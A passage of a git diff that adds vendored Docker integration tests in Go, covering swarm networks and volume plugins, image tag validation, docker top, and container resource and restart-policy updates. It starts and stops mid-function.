+	// In #27866, it was failing because of "network with name %s already exists"
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	out, err = d.Cmd("network", "rm", newNetName)
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+}
+
+// Test case for https://github.com/docker/docker/pull/27938#issuecomment-265768303
+// This test creates two networks with the same name sequentially, with various drivers.
+// Since the operations in this test are done sequentially, the 2nd call should fail with
+// "network with name FOO already exists".
+// Note that it is to ok have multiple networks with the same name if the operations are done
+// in parallel. (#18864)
+func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	drivers := []string{"bridge", "overlay"}
+	for i, driver1 := range drivers {
+		nwName := fmt.Sprintf("network-test-%d", i)
+		for _, driver2 := range drivers {
+			c.Logf("Creating a network named %q with %q, then %q",
+				nwName, driver1, driver2)
+			out, err := d.Cmd("network", "create", "--driver", driver1, nwName)
+			c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+			out, err = d.Cmd("network", "create", "--driver", driver2, nwName)
+			c.Assert(out, checker.Contains,
+				fmt.Sprintf("network with name %s already exists", nwName))
+			c.Assert(err, checker.NotNil)
+			c.Logf("As expected, the attempt to network %q with %q failed: %s",
+				nwName, driver2, out)
+			out, err = d.Cmd("network", "rm", nwName)
+			c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
new file mode 100644
index 0000000000..d9e56ce6df
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
@@ -0,0 +1,52 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Make sure task stays pending before plugin is available
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1)
+
+	plugin := newVolumePlugin(c, "customvolumedriver")
+	defer plugin.Close()
+
+	// create a dummy volume to trigger lazy loading of the plugin
+	out, err = d.Cmd("volume", "create", "-d", "customvolumedriver", "hello")
+
+	// TODO(aaronl): It will take about 15 seconds for swarm to realize the
+	// plugin was loaded. Switching the test over to plugin v2 would avoid
+	// this long delay.
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	out, err = d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	containerID := strings.TrimSpace(out)
+
+	out, err = d.Cmd("inspect", "-f", "{{json .Mounts}}", containerID)
+	c.Assert(err, checker.IsNil)
+
+	var mounts []struct {
+		Name   string
+		Driver string
+	}
+
+	c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil)
+	c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out))
+	c.Assert(mounts[0].Name, checker.Equals, "my-volume")
+	c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
new file mode 100644
index 0000000000..b7d2b1dfe6
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
@@ -0,0 +1,225 @@
+package main
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/go-check/check"
+)
+
+// tagging a named image in a new unprefixed repo should work
+func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+
+	dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz")
+}
+
+// tagging an image by ID in a new unprefixed repo should work
+func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) {
+	imageID := inspectField(c, "busybox", "Id")
+	dockerCmd(c, "tag", imageID, "testfoobarbaz")
+}
+
+// ensure we don't allow the use of invalid repository names; these tag operations should fail
+func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) {
+	invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"}
+
+	for _, repo := range invalidRepos {
+		out, _, err := dockerCmdWithError("tag", "busybox", repo)
+		c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out))
+	}
+}
+
+// ensure we don't allow the use of invalid tags; these tag operations should fail
+func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) {
+	longTag := stringutils.GenerateRandomAlphaOnlyString(121)
+
+	invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag}
+
+	for _, repotag := range invalidTags {
+		out, _, err := dockerCmdWithError("tag", "busybox", repotag)
+		c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out))
+	}
+}
+
+// ensure we allow the use of valid tags
+func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+
+	validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"}
+
+	for _, repo := range validRepos {
+		_, _, err := dockerCmdWithError("tag", "busybox:latest", repo)
+		if err != nil {
+			c.Errorf("tag busybox %v should have worked: %s", repo, err)
+			continue
+		}
+		deleteImages(repo)
+	}
+}
+
+// tag an image with an existed tag name without -f option should work
+func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+
+	dockerCmd(c, "tag", "busybox:latest", "busybox:test")
+}
+
+func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+	// test repository name begin with '-'
+	out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
+
+	// test namespace name begin with '-'
+	out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
+
+	// test index name begin with '-'
+	out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
+}
+
+// ensure tagging using official names works
+// ensure all tags result in the same name
+func (s *DockerSuite) TestTagOfficialNames(c *check.C) {
+	names := []string{
+		"docker.io/busybox",
+		"index.docker.io/busybox",
+		"library/busybox",
+		"docker.io/library/busybox",
+		"index.docker.io/library/busybox",
+	}
+
+	for _, name := range names {
+		out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest")
+		if err != nil || exitCode != 0 {
+			c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out)
+			continue
+		}
+
+		// ensure we don't have multiple tag names.
+		out, _, err = dockerCmdWithError("images")
+		if err != nil {
+			c.Errorf("listing images failed with errors: %v, %s", err, out)
+		} else if strings.Contains(out, name) {
+			c.Errorf("images should not have listed '%s'", name)
+			deleteImages(name + ":latest")
+		}
+	}
+
+	for _, name := range names {
+		_, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest")
+		if err != nil || exitCode != 0 {
+			c.Errorf("tag %v fooo/bar should have worked: %s", name, err)
+			continue
+		}
+		deleteImages("fooo/bar:latest")
+	}
+}
+
+// ensure tags can not match digests
+func (s *DockerSuite) TestTagMatchesDigest(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+	digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507"
+	// test setting tag fails
+	_, _, err := dockerCmdWithError("tag", "busybox:latest", digest)
+	if err == nil {
+		c.Fatal("digest tag a name should have failed")
+	}
+	// check that no new image matches the digest
+	_, _, err = dockerCmdWithError("inspect", digest)
+	if err == nil {
+		c.Fatal("inspecting by digest should have failed")
+	}
+}
+
+func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) {
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+
+	// test setting tag fails
+	_, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag")
+	if err == nil {
+		c.Fatal("tagging with image named \"sha256\" should have failed")
+	}
+}
+
+// ensure tags cannot create ambiguity with image ids
+func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) {
+	//testRequires(c, DaemonIsLinux)
+	// Don't attempt to pull on Windows as not in hub. It's installed
+	// as an image through .ensure-frozen-images-windows
+	if daemonPlatform != "windows" {
+		if err := pullImageIfNotExist("busybox:latest"); err != nil {
+			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
+		}
+	}
+	imageID, err := buildImage("notbusybox:latest",
+		`FROM busybox
+		MAINTAINER dockerio`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	truncatedImageID := stringid.TruncateID(imageID)
+	truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID)
+
+	id := inspectField(c, truncatedTag, "Id")
+
+	// Ensure inspect by image id returns image for image id
+	c.Assert(id, checker.Equals, imageID)
+	c.Logf("Built image: %s", imageID)
+
+	// test setting tag fails
+	_, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag)
+	if err != nil {
+		c.Fatalf("Error tagging with an image id: %s", err)
+	}
+
+	id = inspectField(c, truncatedTag, "Id")
+
+	// Ensure id is imageID and not busybox:latest
+	c.Assert(id, checker.Not(checker.Equals), imageID)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
new file mode 100644
index 0000000000..caae29024a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
@@ -0,0 +1,73 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestTopMultipleArgs(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	var expected icmd.Expected
+	switch daemonPlatform {
+	case "windows":
+		expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"}
+	default:
+		expected = icmd.Expected{Out: "PID"}
+	}
+	result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid")
+	c.Assert(result, icmd.Matches, expected)
+}
+
+func (s *DockerSuite) TestTopNonPrivileged(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out1, _ := dockerCmd(c, "top", cleanedContainerID)
+	out2, _ := dockerCmd(c, "top", cleanedContainerID)
+	dockerCmd(c, "kill", cleanedContainerID)
+
+	// Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters.
+	// Linux will display the command executed in the container
+	var lookingFor string
+	if daemonPlatform == "windows" {
+		lookingFor = "busybox.exe"
+	} else {
+		lookingFor = "top"
+	}
+
+	c.Assert(out1, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the first time", lookingFor))
+	c.Assert(out2, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the second time", lookingFor))
+}
+
+// TestTopWindowsCoreProcesses validates that there are lines for the critical
+// processes which are found in a Windows container. Note Windows is architecturally
+// very different to Linux in this regard.
+func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+	out1, _ := dockerCmd(c, "top", cleanedContainerID)
+	lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"}
+	for i, s := range lookingFor {
+		c.Assert(out1, checker.Contains, s, check.Commentf("top should've listed `%s` in the process list, but failed. Test case %d", s, i))
+	}
+}
+
+func (s *DockerSuite) TestTopPrivileged(c *check.C) {
+	// Windows does not support --privileged
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--privileged", "-i", "-d", "busybox", "top")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out1, _ := dockerCmd(c, "top", cleanedContainerID)
+	out2, _ := dockerCmd(c, "top", cleanedContainerID)
+	dockerCmd(c, "kill", cleanedContainerID)
+
+	c.Assert(out1, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the first time"))
+	c.Assert(out2, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the second time"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
new file mode 100644
index 0000000000..0b31bb45ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
@@ -0,0 +1,41 @@
+package main
+
+import (
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false")
+	timeout := 60 * time.Second
+	if daemonPlatform == "windows" {
+		timeout = 180 * time.Second
+	}
+
+	id := strings.TrimSpace(string(out))
+
+	// update restart policy to on-failure:5
+	dockerCmd(c, "update", "--restart=on-failure:5", id)
+
+	err := waitExited(id, timeout)
+	c.Assert(err, checker.IsNil)
+
+	count := inspectField(c, id, "RestartCount")
+	c.Assert(count, checker.Equals, "5")
+
+	maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+	c.Assert(maximumRetryCount, checker.Equals, "5")
+}
+
+func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) {
+	out, _ := runSleepingContainer(c, "--rm")
+	id := strings.TrimSpace(out)
+
+	// update restart policy for an AutoRemove container
+	out, _, err := dockerCmdWithError("update", "--restart=always", id)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
new file mode 100644
index 0000000000..580ff02602
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
@@ -0,0 +1,283 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"github.com/kr/pty"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top")
+	dockerCmd(c, "update", "-m", "500M", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000")
+
+	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "524288000")
+}
+
+func (s *DockerSuite) TestUpdateRunningContainerWithRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top")
+	dockerCmd(c, "update", "-m", "500M", name)
+	dockerCmd(c, "restart", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000")
+
+	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "524288000")
+}
+
+func (s *DockerSuite) TestUpdateStoppedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+
+	name := "test-update-container"
+	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
+	dockerCmd(c, "run", "--name", name, "-m", "300M", "busybox", "cat", file)
+	dockerCmd(c, "update", "-m", "500M", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000")
+
+	out, _ := dockerCmd(c, "start", "-a", name)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "524288000")
+}
+
+func (s *DockerSuite) TestUpdatePausedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, cpuShare)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "--cpu-shares", "1000", "busybox", "top")
+	dockerCmd(c, "pause", name)
+	dockerCmd(c, "update", "--cpu-shares", "500", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.CPUShares"), checker.Equals, "500")
+
+	dockerCmd(c, "unpause", name)
+	file := "/sys/fs/cgroup/cpu/cpu.shares"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "500")
+}
+
+func (s *DockerSuite) TestUpdateWithUntouchedFields(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, cpuShare)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "--cpu-shares", "800", "busybox", "top")
+	dockerCmd(c, "update", "-m", "500M", name)
+
+	// Update memory and not touch cpus, `cpuset.cpus` should still have the old value
+	out := inspectField(c, name, "HostConfig.CPUShares")
+	c.Assert(out, check.Equals, "800")
+
+	file := "/sys/fs/cgroup/cpu/cpu.shares"
+	out, _ = dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "800")
+}
+
+func (s *DockerSuite) TestUpdateContainerInvalidValue(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true")
+	out, _, err := dockerCmdWithError("update", "-m", "2M", name)
+	c.Assert(err, check.NotNil)
+	expected := "Minimum memory limit allowed is 4MB"
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestUpdateContainerWithoutFlags(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true")
+	_, _, err := dockerCmdWithError("update", name)
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) {
+	testRequires(c, DaemonIsLinux, kernelMemorySupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "--kernel-memory", "50M", "busybox", "top")
+	dockerCmd(c, "update", "--kernel-memory", "100M", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "104857600")
+
+	file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "104857600")
+}
+
+func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) {
+	testRequires(c, DaemonIsLinux, kernelMemorySupport)
+
+	isNewKernel := kernel.CheckKernelVersion(4, 6, 0)
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "busybox", "top")
+	_, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name)
+	// Update kernel memory to a running container without kernel memory initialized
+	// is not allowed before kernel version 4.6.
+	if !isNewKernel {
+		c.Assert(err, check.NotNil)
+	} else {
+		c.Assert(err, check.IsNil)
+	}
+
+	dockerCmd(c, "pause", name)
+	_, _, err = dockerCmdWithError("update", "--kernel-memory", "200M", name)
+	if !isNewKernel {
+		c.Assert(err, check.NotNil)
+	} else {
+		c.Assert(err, check.IsNil)
+	}
+	dockerCmd(c, "unpause", name)
+
+	dockerCmd(c, "stop", name)
+	dockerCmd(c, "update", "--kernel-memory", "300M", name)
+	dockerCmd(c, "start", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "314572800")
+
+	file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "314572800")
+}
+
+func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", "500M", "busybox", "top")
+	dockerCmd(c, "update", "--memory-swap", "600M", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600")
+
+	file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "629145600")
+}
+
+func (s *DockerSuite) TestUpdateInvalidSwapMemory(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", "500M", "busybox", "top")
+	_, _, err := dockerCmdWithError("update", "--memory-swap", "200M", name)
+	// Update invalid swap memory should fail.
+	// This will pass docker config validation, but failed at kernel validation
+	c.Assert(err, check.NotNil)
+
+	// Update invalid swap memory with failure should not change HostConfig
+	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800")
+	c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000")
+
+	dockerCmd(c, "update", "--memory-swap", "600M", name)
+
+	c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600")
+
+	file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "629145600")
+}
+
+func (s *DockerSuite) TestUpdateStats(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, cpuCfsQuota)
+	name := "foo"
+	dockerCmd(c, "run", "-d", "-ti", "--name", name, "-m", "500m", "busybox")
+
+	c.Assert(waitRun(name), checker.IsNil)
+
+	getMemLimit := func(id string) uint64 {
+		resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+		c.Assert(err, checker.IsNil)
+		c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
+
+		var v *types.Stats
+		err = json.NewDecoder(body).Decode(&v)
+		c.Assert(err, checker.IsNil)
+		body.Close()
+
+		return v.MemoryStats.Limit
+	}
+	preMemLimit := getMemLimit(name)
+
+	dockerCmd(c, "update", "--cpu-quota", "2000", name)
+
+	curMemLimit := getMemLimit(name)
+
+	c.Assert(preMemLimit, checker.Equals, curMemLimit)
+
+}
+
+func (s *DockerSuite) TestUpdateMemoryWithSwapMemory(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+
+	name := "test-update-container"
+	dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "busybox", "top")
+	out, _, err := dockerCmdWithError("update", "--memory", "800M", name)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Memory limit should be smaller than already set memoryswap limit")
+
+	dockerCmd(c, "update", "--memory", "800M", "--memory-swap", "1000M", name)
+}
+
+func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) {
+	testRequires(c, DaemonIsLinux, cpuShare)
+
+	out, _ := dockerCmd(c, "run", "-tid", "--restart=always", "busybox", "sh")
+	id := strings.TrimSpace(string(out))
+	dockerCmd(c, "update", "--cpu-shares", "512", id)
+
+	cpty, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil)
+	defer cpty.Close()
+
+	cmd := exec.Command(dockerBinary, "attach", id)
+	cmd.Stdin = tty
+
+	c.Assert(cmd.Start(), checker.IsNil)
+	defer cmd.Process.Kill()
+
+	_, err = cpty.Write([]byte("exit\n"))
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(cmd.Wait(), checker.IsNil)
+
+	// container should restart again and keep running
+	err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second)
+	c.Assert(err, checker.IsNil)
+	c.Assert(waitRun(id), checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
new file mode 100644
index 0000000000..acf74238b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
@@ -0,0 +1,98 @@
+// +build !windows
+
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
+	"github.com/go-check/check"
+)
+
+// user namespaces test: run daemon with remapped root setting
+// 1. validate uid/gid maps are set properly
+// 2. verify that files created are owned by remapped root
+func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel)
+
+	c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil)
+
+	tmpDir, err := ioutil.TempDir("", "userns")
+	c.Assert(err, checker.IsNil)
+
+	defer os.RemoveAll(tmpDir)
+
+	// Set a non-existent path
+	tmpDirNotExists := path.Join(os.TempDir(), "userns"+stringid.GenerateRandomID())
+	defer os.RemoveAll(tmpDirNotExists)
+
+	// we need to find the uid and gid of the remapped root from the daemon's root dir info
+	uidgid := strings.Split(filepath.Base(s.d.root), ".")
+	c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root)))
+	uid, err := strconv.Atoi(uidgid[0])
+	c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid"))
+	gid, err := strconv.Atoi(uidgid[1])
+	c.Assert(err, checker.IsNil, check.Commentf("Can't parse gid"))
+
+	// writable by the remapped root UID/GID pair
+	c.Assert(os.Chown(tmpDir, uid, gid), checker.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name", "userns", "-v", tmpDir+":/goofy", "-v", tmpDirNotExists+":/donald", "busybox", "sh", "-c", "touch /goofy/testfile; top")
+	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+	user := s.findUser(c, "userns")
+	c.Assert(uidgid[0], checker.Equals, user)
+
+	// check that the created directory is owned by remapped uid:gid
+	statNotExists, err := system.Stat(tmpDirNotExists)
